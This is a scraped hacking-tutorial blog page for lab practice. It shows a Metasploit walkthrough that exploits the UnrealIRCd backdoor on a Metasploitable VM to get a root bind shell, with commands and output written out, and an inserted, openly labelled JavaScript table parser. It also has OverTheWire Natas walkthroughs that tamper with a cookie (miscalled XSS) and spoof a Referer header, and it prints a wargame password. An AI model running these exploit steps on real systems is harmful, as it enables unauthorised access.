I receive the following:<br />
<blockquote class="tr_bq">
<pre style="font-family: Courier New, Courier, monospace;">root@bt:~# msfconsole
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 978 exploits - 523 auxiliary - 160 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops
msf ></pre></blockquote>
Whenever you start up Metasploit, there is a cute little banner, which is sometimes an animal saying "metasploit" or asteroids-based ASCII art. Regardless of what you see there, the important stuff is below.<br />
Metasploit will print out its version including core and API version, how many exploits, auxiliary, and post modules it has loaded as well as how many payloads, encoders, and nops it has loaded. Then it presents the user (us) with the prompt, defined by "msf >".<br />
<br />
From here we can start to enter commands. How do we know what to do though? You can receive the help screen and possible options by entering the command:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">help</span></blockquote>
Metasploit will output the following (I will only display a few lines since there are MANY options):<br />
<blockquote class="tr_bq">
<pre style="white-space: pre-wrap; word-wrap: break-word;">msf &gt; help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host

&lt;...snipped...&gt;</pre></blockquote>
<span style="font-family: inherit;">So we can now see all options available to us. A shortcut for "help" is also a question mark ("?"). Please note that the actual output may be formatted slightly differently since it is a copy from terminal to a blog. I will however try to have it look as close as I can to the original, and where needed have screenshots.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The help command is a good reference in case you are stuck on a certain menu, or just want to learn more features of the msfconsole.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">To start off a pentest, we need to find the machines on the network. This is the first step in actually pentesting a network. Note that before a pentest can occur you should have a written contract that explicitly allows you to do so. Of course this is from a business point of view, so if you make a lab for practice like I did, you can skip right to the testing.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Finding all machines and attack vectors is known as "intelligence gathering" or "enumeration" and is the most important part of conducting a penetration test. There are an infinite number of ways to collect intelligence on a network, company, or single node, but I am going to concentrate on the normal ways of attacking a lab environment.</span><br />
<span style="font-family: inherit;"><br /></span>
To find all targets on our network, we would just run an nmap scan against our subnet. There are many different options for nmap, including host OS discovery, stealthy scans, traceroute, and many others. To make this tutorial quicker and easier, we are going to assume we know the IP of our target. Since you should be conducting this in a lab environment, you should know the IP of your Metasploitable machine as well.<br />
<br />
My Metasploitable machine is located at 192.168.1.110 and receives its IP address through my router's DHCP server. I will try to make it as dynamic as possible when giving instructions, but if I use screenshots, IPs may be different than yours.<br />
<br />
Okay, now let's <i>finally</i> start exploiting this machine.<br />
As previously stated, we need to run host enumeration against this machine to see what type of services it has running and which ports are open. Inside of <i>msfconsole</i> we can use the built-in database to save our nmap scans.<br />
Run this command to ensure that our database is connected:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">db_status</span></blockquote>
You should receive something along the lines of:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">[*] postgresql connected to msf3dev</span></blockquote>
<span style="font-family: inherit;">If it spits out an error, then we need to connect our database; however, I will not get into this right now since I want to keep this tutorial on topic of exploitation and pentesting.</span><br />
<br />
To scan this target with nmap and have it placed in the Metasploit database, run the command "db_nmap".<br />
For this target, we are going to run a more thorough scan:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">db_nmap -v -sS -A [ip-address]</span></blockquote>
<span style="font-family: inherit;">The previous nmap options are as follows:</span><br />
<blockquote class="tr_bq">
-v is "verbose" which means it will output more information for us to the screen.<br />
-sS is the "SYN" or "stealth" scan, which doesn't create a full connection to the host and is thus "stealthy". If you want to know more about this, check out the nmap man page or other documentation.<br />
-A is an all-encompassing option which includes Operating System detection, version detection (like the -sV option), script scanning, and traceroute.</blockquote>
Once you run this, a whole lotta stuff should come out at you. Once the scan is done you might be confused with your results, but I'll show you how to easily determine your attack vector.<br />
<br />
When your database has hosts in it, you can display which ones it has tracked with the "hosts" command.<br />
Mine looks like this right now:<br />
<br />
<blockquote class="tr_bq">
<pre style="white-space: pre-wrap; word-wrap: break-word;">msf &gt; hosts

Hosts
=====

address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.1.110  00:0C:29:35:72:58        Linux    Ubuntu            server</pre></blockquote>
<div>
Pretty cool, right? It has the IP, OS, flavor of OS, MAC, and more!</div>
<div>
If we were to run a larger nmap scan, there would be many more hosts listed. This is a great way to keep track of which hosts are which while conducting a pentest.</div>
<div>
<br /></div>
<div>
But how does this help us with our exploitation? Metasploit also has the option to display all services detected by typing "services". This is my output after scanning the Metasploitable host:</div>
<div>
<blockquote class="tr_bq">
<pre style="white-space: pre-wrap; word-wrap: break-word;">msf &gt; services

Services
========

host           port  proto  name         state  info
----           ----  -----  ----         -----  ----
192.168.1.110  21    tcp    ftp          open   vsftpd 2.3.4
192.168.1.110  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.110  23    tcp    telnet       open   Linux telnetd
192.168.1.110  25    tcp    smtp         open   Postfix smtpd
192.168.1.110  53    tcp    domain       open   ISC BIND 9.4.2
192.168.1.110  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.1.110  111   tcp    rpcbind      open   2 rpc #100000
192.168.1.110  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.1.110  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.1.110  512   tcp    exec         open   netkit-rsh rexecd
192.168.1.110  513   tcp    login        open
192.168.1.110  514   tcp    tcpwrapped   open
192.168.1.110  1099  tcp    rmiregistry  open   GNU Classpath grmiregistry
192.168.1.110  1524  tcp    ingreslock   open
192.168.1.110  2049  tcp    nfs          open   2-4 rpc #100003
192.168.1.110  2121  tcp    ftp          open   ProFTPD 1.3.1
192.168.1.110  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
192.168.1.110  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
192.168.1.110  5900  tcp    vnc          open   VNC protocol 3.3
192.168.1.110  6000  tcp    x11          open   access denied
192.168.1.110  6667  tcp    irc          open   Unreal ircd
192.168.1.110  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
192.168.1.110  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1</pre></blockquote>
</div>
<div>
Well that is quite a bit more useful. We can see the IP of the host with which port, protocol, and service is being used. On top of that, since we had version detection on, it displays more information about which version of the service is running.</div>
<div>
We can see port 6667 is running Unreal ircd. Unreal is a server for IRC (Internet Relay Chat), and the "d" at the end of ircd stands for "daemon", meaning it is a background service listening on that port.</div>
<div>
<br /></div>
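The hosts and services tables above are fixed-width text, so they can be parsed back into records and queried instead of read off the screen. The following is an added example, not code from the original post or from Metasploit; the table text it parses is a constructed sample in msfconsole's real alignment (the copy pasted into the blog lost its spacing).

```javascript
// Added example (not code from the original post or from Metasploit): parse the
// fixed-width "hosts" and "services" tables msfconsole prints into records, so
// a lab scan can be queried and reported instead of read off the screen.
// Column starts are taken from the dashed underline row, which is how
// msfconsole aligns its tables; the last column (info/comments) is open-ended.

// Constructed sample in msfconsole's real alignment (the post's copy lost
// its spacing when pasted into the blog).
const SAMPLE_HOSTS = `
Hosts
=====

address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.1.110  00:0C:29:35:72:58        Linux    Ubuntu            server
`;

const SAMPLE_SERVICES = `
Services
========

host           port  proto  name   state  info
----           ----  -----  ----   -----  ----
192.168.1.110  21    tcp    ftp    open   vsftpd 2.3.4
192.168.1.110  22    tcp    ssh    open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.110  513   tcp    login  open
192.168.1.110  6667  tcp    irc    open   Unreal ircd
192.168.1.110  8180  tcp    http   open   Apache Tomcat/Coyote JSP engine 1.1
`;

// Start offset of every column, read from the "----  ----" underline row.
function columnStarts(underline) {
  const starts = [];
  const run = /-+/g;
  let m;
  while ((m = run.exec(underline)) !== null) starts.push(m.index);
  return starts;
}

// Turn one msfconsole table into an array of { column: value } records.
function parseTable(text) {
  const lines = text.split('\n');
  const dashIdx = lines.findIndex((l) => /^\s*-+(\s+-+)*\s*$/.test(l));
  if (dashIdx < 1) throw new Error('no column underline found');
  const starts = columnStarts(lines[dashIdx]);
  // Column i spans [starts[i], starts[i + 1]); the last one runs to end of line.
  const cell = (line, i) => line.slice(starts[i], starts[i + 1]).trim();
  const names = starts.map((_, i) => cell(lines[dashIdx - 1], i));
  const rows = [];
  for (const line of lines.slice(dashIdx + 1)) {
    if (!line.trim()) continue;
    const rec = {};
    names.forEach((name, i) => { rec[name] = cell(line, i); });
    rows.push(rec);
  }
  return rows;
}

// The question the post answers by eye: which services match a product name?
function findServices(rows, pattern) {
  return rows.filter((r) => pattern.test(r.name) || pattern.test(r.info));
}

// Join hosts and services on address: one inventory record per host.
function buildInventory(hostsText, servicesText) {
  const inv = {};
  for (const h of parseTable(hostsText)) {
    inv[h.address] = {
      os: [h.os_name, h.os_flavor].filter(Boolean).join(' '),
      services: [],
    };
  }
  for (const s of parseTable(servicesText)) {
    if (!inv[s.host]) inv[s.host] = { os: '', services: [] };
    inv[s.host].services.push({
      port: Number(s.port), proto: s.proto, name: s.name, info: s.info,
    });
  }
  return inv;
}

console.log(JSON.stringify(buildInventory(SAMPLE_HOSTS, SAMPLE_SERVICES), null, 2));
console.log(findServices(parseTable(SAMPLE_SERVICES), /unreal/i)); // the port 6667 row
```

The same parser handles any msfconsole table with a dashed underline row, so the search, show options and sessions output later in this post can be fed through it as well.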
<div>
Metasploit also has an awesome feature to find exploits, scanners, and other modules with the "search" option. We are going to run the following command to see if there are any modules for Unreal IRC:</div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">search unreal</span></blockquote>
This produces the following:<br />
<blockquote class="tr_bq">
<pre style="white-space: pre-wrap; word-wrap: break-word;">msf &gt; search unreal

Matching Modules
================

   Name                                        Disclosure Date          Rank       Description
   ----                                        ---------------          ----       -----------
   exploit/linux/games/ut2004_secure           2004-06-18 00:00:00 UTC  good       Unreal Tournament 2004 "secure" Overflow (Linux)
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12 00:00:00 UTC  excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
   exploit/windows/games/ut2004_secure         2004-06-18 00:00:00 UTC  good       Unreal Tournament 2004 "secure" Overflow (Win32)</pre></blockquote>
<div>
Unfortunately since the output is so long, it has bumped the description to the following line, but it is still readable.</div>
<div>
We can see there are two exploits for Unreal Tournament 2004, one each for Linux and Windows, but neither of these is useful. The middle result, and the interesting one, is the exploit for UnrealIRCD 3.2.8.1 Backdoor Command Execution, rated "excellent".</div>
<div>
To load a module in Metasploit, we use the "use" command followed by the name of the module:</div>
<div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf > use exploit/unix/irc/unreal_ircd_3281_backdoor<br />msf exploit(unreal_ircd_3281_backdoor) > </span></blockquote>
</div>
<div>
As we can see, our prompt has changed to show that we are using an exploit module, along with its name. When using the "use" command, you can use tab completion, which means if you're stuck, hitting the Tab key will either complete the option or, if tapped twice, display the possible options (if there are multiple). Most Linux users know this feature since it is incredibly useful while moving through a file system or issuing commands quickly.</div>
<div>
<br /></div>
<div>
Now that we have the module loaded, issuing the command "show options" will of course show us the possible options.</div>
<div>
<blockquote>
<pre style="white-space: pre-wrap; word-wrap: break-word;">msf exploit(unreal_ircd_3281_backdoor) &gt; show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target</pre></blockquote>
<span style="font-family: inherit;">There are only two options, and only one target, which is automatic since this exploit is only for one operating system. Both options are required, which means the exploit cannot be run without them. We can see the port is already set, since IRC servers normally run on port 6667, but if someone is trying to hide the service on a different port, this can be changed.</span><br />
<span style="font-family: inherit;">To set or change an option, issue the "set" command followed by the option you wish to change and finally the value you want to set it to, as follows:</span><br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.110<br />RHOST => 192.168.1.110</span></blockquote>
Of course you would set RHOST to whatever the IP address of your exploitable machine is.<br />
<br />
Metasploit has certain "payloads" that we can use to determine what kind of code we want to execute when connecting to the host machine. We are going to statically set which payload to use in this tutorial to understand how to use them.<br />
Since I know which payload I want to use, we won't search for which one to use, but if you want to, you can use the "search" command followed by what you are looking for (e.g. unix shell).<br />
<br />
In this case we are going to use the netcat bind payload (if you have not used netcat, I highly suggest it. I will be writing a how-to for beginners on netcat eventually). To use this payload we run the command:<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/bind_netcat<br />PAYLOAD => cmd/unix/bind_netcat</span></blockquote>
<div>
Let's finally exploit this system! The exploit command has certain options such as -j which runs it as a job, or -z which does not interact with the system after exploitation. These can be used in different ways. To view all of them, use the help command followed by what command you need help with (e.g. <i>help exploit</i>).</div>
<div>
Running our exploit results in this:</div>
<div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > exploit -z<br />[*] Started bind handler<br />[*] Connected to 192.168.1.110:6667...<br /> :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...<br /> :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead<br />[*] Sending backdoor command...<br />[*] Command shell session 3 opened (192.168.1.111:51923 -> 192.168.1.110:4444) at 2012-11-04 22:30:09 -0500<br />[*] Session x created in the background.</span></blockquote>
</div>
<div>
We see some output, and most notably at the bottom "command shell session opened" and "session created in the background". If we had run this without the -z option and without setting a payload, the following output would have been produced:</div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > exploit<br />[*] Started reverse double handler<br />[*] Connected to 192.168.1.110:6667...<br /> :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...<br /> :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead<br />[*] Sending backdoor command...<br />[*] Accepted the first client connection...<br />[*] Accepted the second client connection...<br />[*] Command: echo aeuPuvLl90yRmhts;<br />[*] Writing to socket A<br />[*] Writing to socket B<br />[*] Reading from sockets...<br />[*] Reading from socket B<br />[*] B: "aeuPuvLl90yRmhts\r\n"<br />[*] Matching...<br />[*] A is input...<br />[*] Command shell session x opened (192.168.1.111:4444 -> 192.168.1.110:49034) at 2012-11-03 23:08:41 -0400</span></blockquote>
<div>
That's a lot of output, but it's pretty easy to understand. First it connects to the socket (an IP and port) and receives back the two following lines. After it receives those, it sends the backdoor command and accepts two connections. Part of the exploit is echoing a random string, which is then written to both sockets. Those sockets are then read and whatever is received is printed. After the backdoor goes through, a command shell is opened and given a session number (shown here as x).</div>
<div>
<br /></div>
<div>
After that last exploit run, what you should have is a blank screen. Let's get back to the earlier run with -z, since this was just another option in our exploitation phase. Keep in mind that when running exploits there are numerous ways to get where you need to be, and certain options are better than others.</div>
<div>
<br /></div>
<div>
Now that we have session x created in the background, how do we access it? Of course Metasploit has an awesome command for this, which is "sessions":</div>
<div>
<blockquote>
<pre style="white-space: pre-wrap; word-wrap: break-word;">msf exploit(unreal_ircd_3281_backdoor) &gt; sessions

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  x   shell unix               192.168.1.111:51923 -&gt; 192.168.1.110:4444 (192.168.1.110)</pre></blockquote>
Of course the IP addresses will be different from yours, since we do not have the exact same network, but it should display your exploited system's IP address. The Id will be the number of the session you created, and depends on how many sessions you have opened.<br />
<br />
Finally, to interact with this session, issue the following command:<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > sessions -i x<br />[*] Starting interaction with x...<br />pwd<br />/etc/unreal<br />whoami<br />root<br />id<br />uid=0(root) gid=0(root)</span></blockquote>
So we interact with the session numbered x, and it drops us into that session, which is a command prompt on the exploited machine. Running pwd displays our current working directory, whoami displays which user we have access as, and id displays our uid and gid.<br />
<br />
This completes our tutorial on exploiting the Unreal IRCd backdoor vulnerability in Metasploit and our basic tutorial on using msfconsole. If you have any questions, as always, post them and I will hopefully respond. Thanks for reading!</div>
<br /></div>
<br /></div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-65831363006221625112012-10-30T13:50:00.001-04:002022-12-20T10:46:16.867-05:00OverTheWire Wargame "Natas" Level 5 [How-To/Web]<div dir="ltr" style="text-align: left;" trbidi="on">
So we cracked <a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-4-how.html" target="_blank">Level 4</a> with some knowledge of HTTP headers and requests, and used a cool little app to help us out. Now we are on <a href="http://natas5.natas.labs.overthewire.org/" target="_blank">Level 5</a>, and after logging in it presents us with a weird page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJiJr-2TkMNgF5OFFBDV8xfLUQvhOGxycz-_28dUiLtIcdgtsa2xxKf_PQ51DHdsqrS34a0effIJA4uf5kFBJpNjOmGbJuKvmaP9D6QyQl8lBYg0lnr1wBaQ5tc7BLwWY3mhH8ZJS82g/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJiJr-2TkMNgF5OFFBDV8xfLUQvhOGxycz-_28dUiLtIcdgtsa2xxKf_PQ51DHdsqrS34a0effIJA4uf5kFBJpNjOmGbJuKvmaP9D6QyQl8lBYg0lnr1wBaQ5tc7BLwWY3mhH8ZJS82g/s640/1.PNG" width="640" /></a></div>
<br />
Well wait, didn't we just log in? Why does it say we aren't?<br />
<br />
<a name='more'></a>Looks like the password didn't authenticate us correctly, OR there's something blocking our authentication even further.<br />
<br />
Right away, I knew what to do. What is something in a browser that holds certain information, including login information? Cookies! But how am I going to check out the delicious cookies? Javascript!<br />
<br />
Don't worry, the Javascript we'll be using is <i>really easy</i> to understand. I don't even know a lot of JS, but it's easy for me to do.<br />
<br />
Below is the Javascript that we can use to view the cookies on the current "document" (webpage):<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">alert(document.cookie);</span></blockquote>
<span style="font-family: inherit;">But how do we get this to run on the website? We put it into the navigation bar!</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmqYXiTPJ8c8MQXBeDfHg1SbRvGZS7fJhAkiNYExXfzsCXjRq-PL1RTHtZZTFvZgtndCItQMu_PDuE5nr2Jsv06p0nfQ6kn-E6JELWuzavWXVEg0tb9j29tFw6ZaSRtAb7JdG16B7ZeUg/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmqYXiTPJ8c8MQXBeDfHg1SbRvGZS7fJhAkiNYExXfzsCXjRq-PL1RTHtZZTFvZgtndCItQMu_PDuE5nr2Jsv06p0nfQ6kn-E6JELWuzavWXVEg0tb9j29tFw6ZaSRtAb7JdG16B7ZeUg/s400/2.png" width="400" /></a></div>
<br />
What this is doing is running a Javascript script denoted by the "javascript:" and it will pop up an "alert" window with the document cookie.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY84NnPQd9ntQNko3ZOSV-j6UcLpfbDZISdMeCDGSiuLOFUKm1zaeAGoKwLjzksQ1iGYjwHt_GMBFWKqvwt56q6oQtbO_aIc-pSt70EyER9ZF3bQjR6uTLi0hbwB-iX6hwkNMo2V6HIF4/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY84NnPQd9ntQNko3ZOSV-j6UcLpfbDZISdMeCDGSiuLOFUKm1zaeAGoKwLjzksQ1iGYjwHt_GMBFWKqvwt56q6oQtbO_aIc-pSt70EyER9ZF3bQjR6uTLi0hbwB-iX6hwkNMo2V6HIF4/s400/3.PNG" width="400" /></a></div>
<br />
Looks like a bunch of gibberish... but wait, what's that at the end!<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">loggedin=0</span></blockquote>
<span style="font-family: inherit;">Well, as we know from binary, 0 is false and 1 is true, so it's saying we're not logged in! How do we go about changing this? We use Javascript again to exploit an XSS (cross-site scripting) attack and change the value of the cookie.</span><br />
<br />
The Javascript this time is:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">void(document.cookie="loggedin=1");</span></blockquote>
<span style="font-family: inherit;">Which means that the return type is "void" (returns nothing), and we want to set the cookie in the current document (webpage) to the value "loggedin=1". We know that cookie already exists because we saw it, so this should change it from 0 (not authenticated) to 1 (authenticated).</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin91VygisXnoHzp0LMWRdwRxADbO1jLQH4EQo8GSlF7krWJzZIrn82eXzi-lXkNh2vBEFOni_ekO9ZbS_huud1yoU-T6SGu_NJNDed9h_xmcwe-SgFqnkdnDMVWQ1thiM1gPoUuOtMy_g/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin91VygisXnoHzp0LMWRdwRxADbO1jLQH4EQo8GSlF7krWJzZIrn82eXzi-lXkNh2vBEFOni_ekO9ZbS_huud1yoU-T6SGu_NJNDed9h_xmcwe-SgFqnkdnDMVWQ1thiM1gPoUuOtMy_g/s400/4.png" width="400" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Now hit enter and let's see what happens.</span><br />
<span style="font-family: inherit;">Well, nothing should really happen that you can see, because we had the return type set as "void".</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">What you can do now, is either run the Javascript to view the cookie again, or just refresh to see:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidA08s-8ryQbKDqFuWJgqChyphenhyphen9qXisTi3DfiSXE9a-MaZynSi9q4XI4DZp_wBOzbkhQqCVwem_2WXvn22yPLdZPslhlMQDcB159bIy37V5gMrkEHsVuvnJY8T_e9H8Rl2m22JuN25f8wEs/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidA08s-8ryQbKDqFuWJgqChyphenhyphen9qXisTi3DfiSXE9a-MaZynSi9q4XI4DZp_wBOzbkhQqCVwem_2WXvn22yPLdZPslhlMQDcB159bIy37V5gMrkEHsVuvnJY8T_e9H8Rl2m22JuN25f8wEs/s640/5.PNG" width="640" /></a></div>
<span style="font-family: inherit;"><br /></span>
<br />
<span style="font-family: inherit;">So we see natas6:</span><span style="background-color: white;">mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">On to <a href="http://natas6.natas.labs.overthewire.org/" target="_blank">Level 6</a>.</span></div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-5700726662471530792012-10-30T11:48:00.002-04:002022-12-20T10:46:17.438-05:00OverTheWire Wargame "Natas" Level 4 [How-To/Web]<div dir="ltr" style="text-align: left;" trbidi="on">
So <a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-3-how.html" target="_blank">Level 3</a> required a bit more knowledge of web servers and how search engines crawl them, but we got through it and are now on <a href="http://natas4.natas.labs.overthewire.org/" target="_blank">Level 4</a>.<br />
<br />
When we load up this level, we are welcomed by the following error:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg60etQw6CULOURR3zesKdE1Wbxiamv26WRgL_hcVi_YhdKhPz0m1ArnUPa_R39xaDLZ8hWO-ovy50tgDQte4BjGbODgiofuAiokyCnht5saT5KlqoZmSfRnsIPoLRNgBMWhYWzhdohjxE/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg60etQw6CULOURR3zesKdE1Wbxiamv26WRgL_hcVi_YhdKhPz0m1ArnUPa_R39xaDLZ8hWO-ovy50tgDQte4BjGbODgiofuAiokyCnht5saT5KlqoZmSfRnsIPoLRNgBMWhYWzhdohjxE/s640/1.PNG" width="640" /></a></div>
<br />
So it can see where we are coming from, and it doesn't like it.<br />
<br />
<a name='more'></a>There's a "Refresh page" button, let's click that and see what happens.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpXZbYbTy8jv2H86UNblaTLs8a71YAGp5cmiugWPW46EW1_9CDd19E3zbYagC2UadAUAc1-pavykCmkJaBm-cGXLKNUtPumyiR7mpmVtxChzz4aUdLvudO62AOueucP5gLuA07Dqo-Oqg/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpXZbYbTy8jv2H86UNblaTLs8a71YAGp5cmiugWPW46EW1_9CDd19E3zbYagC2UadAUAc1-pavykCmkJaBm-cGXLKNUtPumyiR7mpmVtxChzz4aUdLvudO62AOueucP5gLuA07Dqo-Oqg/s640/2.PNG" width="640" /></a></div>
<br />
So now it sees that we are just refreshing the page. A little knowledge of how messages are sent over HTTP is required here.<br />
When an HTTP request is made, there are certain header fields that are filled in, and one of them is the "<a href="http://en.wikipedia.org/wiki/HTTP_referer" target="_blank">referer</a>".<br />
Maybe you can see where I'm going from here. What we need to do is change the referrer in the request to what the page says it should be.<br />
<br />
How are we going to do this? Well, I'm using Chrome, and there's this nice little tool called "Referer Control" which can be found <a href="https://chrome.google.com/webstore/detail/referer-control/hnkcfpcejkafcihlgbojoidoihckciin" target="_blank">here</a>. Go ahead and install it (and if you're not, use Chrome already!) and I'll tell you how to configure it to help us out.<br />
<br />
Loading up this app brings us to the main screen of the configuration:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj7m8_x1L7XN2bwKQmA0RGe7a0quYgLy5oUco9tvB0QBpFjrps1XPUuN7siHcLP_UFHWZobOmyLOaJdn1U-xHFjqpgUnu5oF4wXrzIGk46eIgoWcuKWHy17y5JE-Pclx9rMABc6W89SQw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj7m8_x1L7XN2bwKQmA0RGe7a0quYgLy5oUco9tvB0QBpFjrps1XPUuN7siHcLP_UFHWZobOmyLOaJdn1U-xHFjqpgUnu5oF4wXrzIGk46eIgoWcuKWHy17y5JE-Pclx9rMABc6W89SQw/s640/3.PNG" width="640" /></a></div>
<br />
<br />
For our setup, we are going to use the top section, where we can enter a website under "site filter".<br />
If we use the "default referrer for all other sites" it will change it for every single HTTP request we make.<br />
<br />
Enter "<a href="http://natas4.natas.labs.overthewire.org/index.php">http://natas4.natas.labs.overthewire.org/</a>" for the site, and select the "Custom" setting for the "referrer setting".<br />
From there, enter "<a href="http://natas5.natas.labs.overthewire.org/">http://natas5.natas.labs.overthewire.org/</a>" for the referrer site as seen below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilFCKDVuZjd6CMy856LA5RTpX5euk3Ob-BhrqBxceK5UHq1Oi8YBU3RyjzfLO9alFBYbN56kH2g3KFOirKIk2oXiHX3wa31ryyPozmNnJEzbPv_vdqFk7z2-3mWufcCjjMCgZt_1P-mgU/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilFCKDVuZjd6CMy856LA5RTpX5euk3Ob-BhrqBxceK5UHq1Oi8YBU3RyjzfLO9alFBYbN56kH2g3KFOirKIk2oXiHX3wa31ryyPozmNnJEzbPv_vdqFk7z2-3mWufcCjjMCgZt_1P-mgU/s640/4.PNG" width="640" /></a></div>
<br />
<br />
The red X on the left is the delete button (not an error), so don't click on that unless you want to remove this specific site referral.<br />
<br />
Once this is done, go back to <a href="http://natas4.natas.labs.overthewire.org/" target="_blank">Level 4</a>, and you should see this (you might have to refresh the Referrer Control Settings):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
